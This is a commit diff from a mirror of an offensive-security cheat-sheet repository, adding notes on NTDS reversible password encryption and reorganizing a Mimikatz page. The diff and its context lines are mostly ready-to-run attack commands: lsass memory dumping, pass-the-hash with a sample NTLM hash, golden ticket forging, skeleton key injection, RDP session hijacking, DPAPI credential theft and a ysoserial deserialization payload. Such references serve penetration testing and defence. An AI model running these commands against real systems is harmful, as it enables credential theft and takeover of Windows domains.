mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-07 10:38:45 +00:00
NTDS Reversible Encryption
This commit is contained in:
parent
4ca065f8ed
commit
5966c3a21b
3 changed files with 82 additions and 53 deletions
|
@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
|
||||||
|
|
||||||
### JSON.NET
|
### JSON.NET
|
||||||
|
|
||||||
|
* In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
|
||||||
* Payload output: **JSON**
|
* Payload output: **JSON**
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
|
|
|
@ -40,6 +40,7 @@
|
||||||
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
- [Using Mimikatz DCSync](#using-mimikatz-dcsync)
|
||||||
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
- [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
|
||||||
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
- [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
|
||||||
|
- [NTDS Reversible Encryption](#ntds-reversible-encryption)
|
||||||
- [User Hunting](#user-hunting)
|
- [User Hunting](#user-hunting)
|
||||||
- [Password spraying](#password-spraying)
|
- [Password spraying](#password-spraying)
|
||||||
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
|
- [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
|
||||||
|
@ -482,24 +483,27 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
|
||||||
|
|
||||||
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
|
This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
|
||||||
|
|
||||||
```powershell
|
* RPCClient
|
||||||
# remote
|
```powershell
|
||||||
rpcclient $> lookupnames john.smith
|
rpcclient $> lookupnames john.smith
|
||||||
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
|
||||||
|
```
|
||||||
# loc
|
* WMI
|
||||||
wmic useraccount get name,sid
|
```powershell
|
||||||
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
wmic useraccount get name,sid
|
||||||
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
Administrator S-1-5-21-3415849876-833628785-5197346142-500
|
||||||
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
Guest S-1-5-21-3415849876-833628785-5197346142-501
|
||||||
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
Administrator S-1-5-21-297520375-2634728305-5197346142-500
|
||||||
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
Guest S-1-5-21-297520375-2634728305-5197346142-501
|
||||||
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
|
||||||
|
lambda S-1-5-21-297520375-2634728305-5197346142-1110
|
||||||
# powerview
|
```
|
||||||
Convert-NameToSid high-sec-corp.localkrbtgt
|
* Powerview
|
||||||
S-1-5-21-2941561648-383941485-1389968811-502
|
```powershell
|
||||||
```
|
Convert-NameToSid high-sec-corp.localkrbtgt
|
||||||
|
S-1-5-21-2941561648-383941485-1389968811-502
|
||||||
|
```
|
||||||
|
* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid`
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
|
||||||
|
@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
|
||||||
- [crackstation.net](https://crackstation.net)
|
- [crackstation.net](https://crackstation.net)
|
||||||
- [hashes.com](https://hashes.com/en/decrypt/hash)
|
- [hashes.com](https://hashes.com/en/decrypt/hash)
|
||||||
|
|
||||||
|
|
||||||
|
#### NTDS Reversible Encryption
|
||||||
|
|
||||||
|
`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form.
|
||||||
|
|
||||||
|
The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.
|
||||||
|
This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
|
||||||
|
|
||||||
|
* List users with "Store passwords using reversible encryption" enabled
|
||||||
|
```powershell
|
||||||
|
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
|
||||||
|
```
|
||||||
|
|
||||||
|
The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT.
|
||||||
|
|
||||||
|
|
||||||
### User Hunting
|
### User Hunting
|
||||||
|
|
||||||
Sometimes you need to find a machine where a specific user is logged in.
|
Sometimes you need to find a machine where a specific user is logged in.
|
||||||
|
|
|
@ -2,25 +2,25 @@
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Mimikatz - Execute commands](#mimikatz---execute-commands)
|
* [Execute commands](#execute-commands)
|
||||||
* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
|
* [Extract passwords](#extract-passwords)
|
||||||
* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround)
|
* [LSA Protection Workaround](#lsa-protection-workaround)
|
||||||
* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
|
* [Mini Dump](#mini-dump)
|
||||||
* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
|
* [Pass The Hash](#pass-the-hash)
|
||||||
* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
|
* [Golden ticket](#golden-ticket)
|
||||||
* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
|
* [Skeleton key](#skeleton-key)
|
||||||
* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
|
* [RDP session takeover](#rdp-session-takeover)
|
||||||
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
* [Credential Manager & DPAPI](#credential-manager--dpapi)
|
||||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||||
* [Vault](#vault)
|
* [Vault](#vault)
|
||||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
* [Commands list](#commands-list)
|
||||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
* [Powershell version](#powershell-version)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
|
||||||
|
|
||||||
## Mimikatz - Execute commands
|
## Execute commands
|
||||||
|
|
||||||
Only one command
|
Only one command
|
||||||
|
|
||||||
|
@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords
|
||||||
mimikatz # sekurlsa::wdigest
|
mimikatz # sekurlsa::wdigest
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Extract passwords
|
## Extract passwords
|
||||||
|
|
||||||
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
|
||||||
|
|
||||||
|
@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||||
* Adding requires lock
|
* Adding requires lock
|
||||||
* Removing requires reboot
|
* Removing requires reboot
|
||||||
|
|
||||||
## Mimikatz - LSA Protection Workaround
|
## LSA Protection Workaround
|
||||||
|
|
||||||
- LSA as a Protected Process (RunAsPPL)
|
- LSA as a Protected Process (RunAsPPL)
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Mini Dump
|
## Mini Dump
|
||||||
|
|
||||||
Dump the lsass process with `procdump`
|
Dump the lsass process with `procdump`
|
||||||
|
|
||||||
|
@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
Use the minidump:
|
||||||
|
* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
|
||||||
|
```powershell
|
||||||
|
mimikatz # sekurlsa::minidump lsass.dmp
|
||||||
|
mimikatz # sekurlsa::logonPasswords
|
||||||
|
```
|
||||||
|
* Pypykatz: `pypykatz lsa minidump lsass.dmp`
|
||||||
|
|
||||||
Then load it inside Mimikatz.
|
|
||||||
|
|
||||||
```powershell
|
## Pass The Hash
|
||||||
mimikatz # sekurlsa::minidump lsass.dmp
|
|
||||||
Switch to minidump
|
|
||||||
mimikatz # sekurlsa::logonPasswords
|
|
||||||
```
|
|
||||||
|
|
||||||
## Mimikatz - Pass The Hash
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
|
mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Golden ticket
|
## Golden ticket
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
|
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
|
||||||
|
@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15
|
||||||
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Skeleton key
|
## Skeleton key
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
privilege::debug
|
privilege::debug
|
||||||
|
@ -168,17 +168,25 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
|
||||||
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - RDP session takeover
|
## RDP session takeover
|
||||||
|
|
||||||
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
Use `ts::multirdp` to patch the RDP service to allow more than two users.
|
||||||
|
|
||||||
Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
|
* Enable privileges
|
||||||
|
```powershell
|
||||||
|
privilege::debug
|
||||||
|
token::elevate
|
||||||
|
```
|
||||||
|
* List RDP sessions
|
||||||
|
```powershell
|
||||||
|
ts::sessions
|
||||||
|
```
|
||||||
|
* Hijack session
|
||||||
|
```powershell
|
||||||
|
ts::remote /id:2
|
||||||
|
```
|
||||||
|
|
||||||
```powershell
|
Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password.
|
||||||
privilege::debug
|
|
||||||
token::elevate
|
|
||||||
ts::remote /id:2
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# get the Session ID you want to hijack
|
# get the Session ID you want to hijack
|
||||||
|
@ -188,7 +196,7 @@ net start sesshijack
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Credential Manager & DPAPI
|
## Credential Manager & DPAPI
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# check the folder to find credentials
|
# check the folder to find credentials
|
||||||
|
@ -235,7 +243,7 @@ Attributes : 0
|
||||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Mimikatz - Commands list
|
## Commands list
|
||||||
|
|
||||||
| Command |Definition|
|
| Command |Definition|
|
||||||
|:----------------:|:---------------|
|
|:----------------:|:---------------|
|
||||||
|
@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||||
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|
|TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
|
||||||
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
|
|TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
|
||||||
|
|
||||||
## Mimikatz - Powershell version
|
## Powershell version
|
||||||
|
|
||||||
Mimikatz in memory (no binary on disk) with :
|
Mimikatz in memory (no binary on disk) with :
|
||||||
|
|
||||||
|
|
Loading…
Reference in a new issue